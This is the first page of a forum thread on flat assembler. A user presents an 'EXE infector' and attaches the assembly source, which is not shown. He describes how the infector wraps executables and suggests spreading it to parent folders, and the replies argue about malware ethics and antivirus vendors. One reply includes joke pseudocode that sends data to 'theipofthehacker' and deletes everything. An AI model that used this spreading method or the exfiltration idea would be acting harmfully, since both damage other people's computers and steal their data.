flat assembler
Message board for the users of flat assembler.

Index > Tutorials and Examples > Rather easy EXE infector

Goto page 1, 2, 3  Next
Author
Thread Post new topic Reply to topic
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 06:53
A very simple way of infecting EXEs. Not practical but quite useful. All it does is append the original code to a stub, which will execute itself first then the original code. IMO I prefer entry point hijacking and and reconstructing the whole PE file. However, that method would not work on encrypted EXEs. This is where this method comes in.

There are different ways of executing the original code. In this example, I just duplicate the infected file and remove the stub and let the windows loader take care of the rest. The duped file is hidden in the same folder but can also be extracted to a different folder.

The stub then waits for duplicated file and deletes it after its process terminates.

A more effective way is to find EXEs in current directory, infect them then move up to parent folder and up to a specified depth.

No error checking just straight up execution and no optimizations. Does not check if file is already infected. It will impregnate the file even more if infector.exe is ran multiple times.


Description:
Download
Filename: stub.ASM
Filesize: 3.14 KB
Downloaded: 923 Time(s)

Description:
Download
Filename: victim_exe.ASM
Filesize: 416 Bytes
Downloaded: 914 Time(s)

Description:
Download
Filename: infector.ASM
Filesize: 3.25 KB
Downloaded: 921 Time(s)

Post 25 Dec 2013, 06:53
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:02
typedef wrote:
Not practical but quite useful.
Useful for what? Can you give an example usage that does not involve malware?
Post 25 Dec 2013, 07:02
View user's profile Send private message Visit poster's website Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 07:05
revolution wrote:
typedef wrote:
Not practical but quite useful.
Useful for what? Can you give an example usage that does not involve malware?


Useful to malware analysis personnel. Now we can update our API pattern call hashes and flag these types of files.
Post 25 Dec 2013, 07:05
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:06
typedef wrote:
revolution wrote:
typedef wrote:
Not practical but quite useful.
Useful for what? Can you give an example usage that does not involve malware?


Useful to malware analysis personnel. Now we can update our API pattern call hashes and flag these types of files.
That involves malware.
Post 25 Dec 2013, 07:06
View user's profile Send private message Visit poster's website Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 07:10
revolution wrote:
typedef wrote:
revolution wrote:
typedef wrote:
Not practical but quite useful.
Useful for what? Can you give an example usage that does not involve malware?


Useful to malware analysis personnel. Now we can update our API pattern call hashes and flag these types of files.
That involves malware.


rev
Without malware you think AV companies will make a dime?
Post 25 Dec 2013, 07:10
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:11
Without malware we wouldn't need AV companies. Then we could have more cool things instead of broken computers.

So I guess you have no example that doesn't involve malware?
Post 25 Dec 2013, 07:11
View user's profile Send private message Visit poster's website Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 07:15
revolution wrote:
Without malware we wouldn't need AV companies. Then we could have more cool things instead of broken computers.

So I guess you have no example that doesn't involve malware?


Without broken computers there wouldn't be malware, and then there wouldn't be AV companies. And without Govt. backdoors and poor coding skills and hunger for money, there wouldn't be broken computers.
Post 25 Dec 2013, 07:15
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:20
Creating malware is like burning down houses. All houses are susceptible to being burnt down but that doesn't mean we should be burning them down just to force us into making more robust houses. And just like malware, burning down houses creates no net positive for society, it just makes everyone waste time and effort to rebuild.
Post 25 Dec 2013, 07:20
View user's profile Send private message Visit poster's website Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
typedef 25 Dec 2013, 07:29
revolution wrote:
Creating malware is like burning down houses. All houses are susceptible to being burnt down but that doesn't mean we should be burning them down just to force us into making more robust houses. And just like malware, burning down houses creates no net positive for society, it just makes everyone waste time and effort to rebuild.


But the people who rebuild the houses love to do so because they are hungry for money, and sometimes they'll burn down some houses themsevles just to be the ones to get hired to rebuild the houses.

Rolling Eyes Wonder why AVs cook up stories about malware that no one has even heard of and force you to buy/upgrade their software. Hell, they even make their software deliberately "incompatible" with other security software so their malware don't get flagged by their competitors.


Last edited by typedef on 25 Dec 2013, 07:45; edited 1 time in total
Post 25 Dec 2013, 07:29
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20458
Location: In your JS exploiting you and your system
revolution 25 Dec 2013, 07:31
Indeed. I am no fan of AV companies either. It is not a perfect world we live in.
Post 25 Dec 2013, 07:31
View user's profile Send private message Visit poster's website Reply with quote
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1178
Location: Unknown
HaHaAnonymous 25 Dec 2013, 13:38
[ Post removed by author. ]


Last edited by HaHaAnonymous on 28 Feb 2015, 18:54; edited 1 time in total
Post 25 Dec 2013, 13:38
View user's profile Send private message Reply with quote
baldr



Joined: 19 Mar 2008
Posts: 1651
baldr 25 Dec 2013, 14:07
HaHaAnonymous,

They have to sell product (as insecure as it is), it has nothing to do with your expectations (about its stability/satisfaction/whatever). It works (up to some measure), then it can be sold. Nothing personal, just business. Wink

AV authors can (and probably would) intimidate regular users to use (and buy) their products, just as houseware manufacturers insist that their products will make our living safer. They both lie, in a way. It's about how long would you go to check it.
Post 25 Dec 2013, 14:07
View user's profile Send private message Reply with quote
m3ntal



Joined: 08 Dec 2013
Posts: 296
m3ntal 25 Dec 2013, 18:29
typedef: I'm sure you have some positive examples. How about a binary tree? Or a minimal Android example?

If an agency contacted me to create malware software, I'd refuse their business and tell them that it goes against my philosophy that software should be productive and not destructive to the user. Knowledge of LL concepts, machine code, executable formats, etc, can be used in a positive way; example: dynamic binary translator to/from X86+ARM. Just my thoughts.
Post 25 Dec 2013, 18:29
View user's profile Send private message Reply with quote
Frank



Joined: 17 Jun 2003
Posts: 100
Frank 29 Dec 2013, 14:38
Alright, after eleven off-topic responses, maybe someone should comment on the actual tutorial.

typedef, you have provided a generic EXE wrapper template. The code is written cleanly, it is easy to understand, and when I tried it briefly, it worked as expected (WIN7 Home Edition; no serious virus scanner installed). Insofar it is a very nice addition for the "Examples and Tutorials" section of this board. Congratulations!

What needs a bit more work in the future is how you describe your contributions. By needlessly (and incorrectly!) framing your "EXE wrapper" as an "EXE infector" you achieved several things that you probably don't want: (a) you made yourself look like an attention-whoring 14-year old, (b) you invited the useless weirdo discussion about malware that you now got, rather than receiving useful feedback from competent people, and (c) people interested in EXE wrapping for legit purposes will ignore your tutorial because its context shouts "filth, smut, danger" loudly enough to make them not even look at the code. No congratulations on that.

This feedback is genuinely meant to be useful to you. You're welcome.
Post 29 Dec 2013, 14:38
View user's profile Send private message Reply with quote
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1178
Location: Unknown
HaHaAnonymous 29 Dec 2013, 17:01
[ Post removed by author. ]


Last edited by HaHaAnonymous on 28 Feb 2015, 18:41; edited 1 time in total
Post 29 Dec 2013, 17:01
View user's profile Send private message Reply with quote
edfed



Joined: 20 Feb 2006
Posts: 4353
Location: Now
edfed 31 Dec 2013, 12:04
malwares are just like regular softwares with curious policies...

a machine is dumb (mov eax,ebx lea eax,[eax*5] etc...) it does what you tell it to do.
a malware just involve the same instructions than regular softwares, but they are agenced in order to break the system...

then, it is not the lazyness of system developper or whatever, but just the will of malware writers to make malwares.

you can virtually write malwares for any programmable machine, from a heater regulator to a cray, but it is just malware.

the goal of software is not to reproduce the genetically altered things we see in hospitals, but to make cooler and cooler stuff.

maybe malware can bring some bricks to the future of computing, by highlighting some basic mechanisms of attacks and study some ways to avoid them... but there will always be malware writers, even for the more secure platform.

then, what the goal of security? take 30%, 60%, 99% of the machine just to protect it???

ridiculous.

the size of AV softwares is just a big insult to the freedom's and the efficiency's needs of this time.

i don't believe malware are cool at all.

first, it is a pure waste of time to create malwares, the creativeness of malware writer is poorly exploited.
second, it is a pure waste of ressources, the machines running malwares will use energy and hardware to do that, and what it does is clearly useless.

anybody can tell you that bill gates became what he is now by writing goodwares (not malwares).
what he did was to make usefull OS and suites, used by billions peoples, and it is not cause it is microsoft, it is not also cause he was the son of somebody, but just cause he focused on creativity and usefullness of his products.

of course, m$ is $hit, but a cool $hit, and i don't believe that anybody here never used a m$ product at least one time in his life...

in fact, malwares are just the product of jealous peoples that consider windows as the shit of the century...

in my opinion, the real shit is more a military product like kalashnikov, or a chemical like DDT, or something really dangerous...

and that's the reason why bill gates became what he is now. he didn't created malwares and weapons, but just softwares used by the weapons designers. Smile

hem...

bill gates is not a model to follow, but he is not the problem to fight.
and writing malwares is always possible, even a fortress can be attacked. then, what do we need?

computers or fortress?

i need computer to do cool things, not fortress to hide behind with fear.


and windows 98 is really cool cause now, it cannot longer browse the internet cause the new scripts norms are not supported Smile
then, win98 is just a pure machine, able to do stuff like they did before internet generalisation.

for example, win98 supports very well the sockets Smile and that is very cool to try networks designs Smile

and fuck malwares.

for example, this kind of pseudocode:
Code:
invoke sendEverythingInbackGround,"theipofthehacker"
invoke deleteEverythingInBackgroundWithAdminPrivilege
    
Post 31 Dec 2013, 12:04
View user's profile Send private message Visit poster's website Reply with quote
DOS386



Joined: 08 Dec 2006
Posts: 1905
DOS386 01 Jan 2014, 09:03
revolution wrote:
Creating malware is like burning down houses


NO. Creating malware is like creating matches. But nowadays nobody needs malware (we got it already from M$), like nobody needs matches (we no longer heat using fire).

So creating malware is useless but legal. Using malware to destroy other people's PC's is a crime. And creating matches is useless but legal. Using maches to burn down other people's houses is a crime.

Further, nobody would have malware problems or need "AV" (= malware) if hardware and OS'es were designed properly.
Post 01 Jan 2014, 09:03
View user's profile Send private message Reply with quote
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1178
Location: Unknown
HaHaAnonymous 01 Jan 2014, 14:12
[ Post removed by author. ]


Last edited by HaHaAnonymous on 28 Feb 2015, 18:40; edited 1 time in total
Post 01 Jan 2014, 14:12
View user's profile Send private message Reply with quote
tthsqe



Joined: 20 May 2009
Posts: 767
tthsqe 02 Jan 2014, 19:26
HaHaAnonymous, if what you are saying it true, are not AV companies themselves viruses on the computer market? I always thought of AV programs as viruses ever sense I reached the age of reason...
Post 02 Jan 2014, 19:26
View user's profile Send private message Reply with quote
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1178
Location: Unknown
HaHaAnonymous 02 Jan 2014, 23:44
[ Post removed by author. ]


Last edited by HaHaAnonymous on 28 Feb 2015, 18:40; edited 1 time in total
Post 02 Jan 2014, 23:44
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  
Goto page 1, 2, 3  Next

< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.